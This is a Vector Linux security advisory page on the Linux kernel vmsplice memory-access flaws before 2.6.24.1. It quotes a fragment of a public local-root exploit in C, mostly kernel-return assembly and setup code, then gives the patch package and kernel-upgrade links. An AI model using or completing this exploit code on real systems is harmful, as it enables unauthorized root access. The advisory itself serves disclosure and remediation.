Skip to content. | Skip to navigation

Sections
Personal tools
You are here: Home News Kernel Exploit
 

Kernel Exploit

— filed under:

Linux Kernel Multiple Prior to 2.6.24.1 Multiple Memory Access Vulnerabilities

A vulnerability was found in the Linux Kernel:

- Allows unauthorized users to read arbitrary memory locations.
- Allows unauthorized users to write to arbitrary memory locations.
- Allows local attackers to access resources in certain vservers.

An attacker can exploit these issues to read and write to arbitrary memory locations on the affected computer.

This issue affects versions prior to Linux Kernel 2.6.24.1, including the kernel version in Vector Linux 5.9 Standard Edition.

The Exploit

/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 * 
 * -static -Wno-format  
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"

#endif

The Solution

The Vector Linux Team packaged a patch for VectorLinux 5.9 installable via package manager, login as root in a virtual terminal and run:

slapt-get --update && slapt-get --install novmsplice

Another option (recommended) is to upgrade the kernel to 2.6.22.19:

http://vectorlinux.osuosl.org/veclinux-5.9/kernels/kernel-2.6.22.19-i586-1vl59.tlz

http://vectorlinux.osuosl.org/veclinux-5.9/kernels/kernel-modules-2.6.22.19-i586-2vl59.tlz

http://vectorlinux.osuosl.org/veclinux-5.9/kernels/kernel-src-2.6.22.19-i586-1vl59.tlz

Download the packages and install them as root with slapt-get as a regular package. Reboot and a new intro in Lilo will be available.

  NOTE: Don't remove the older kernel until you are sure it works for you!  

Document Actions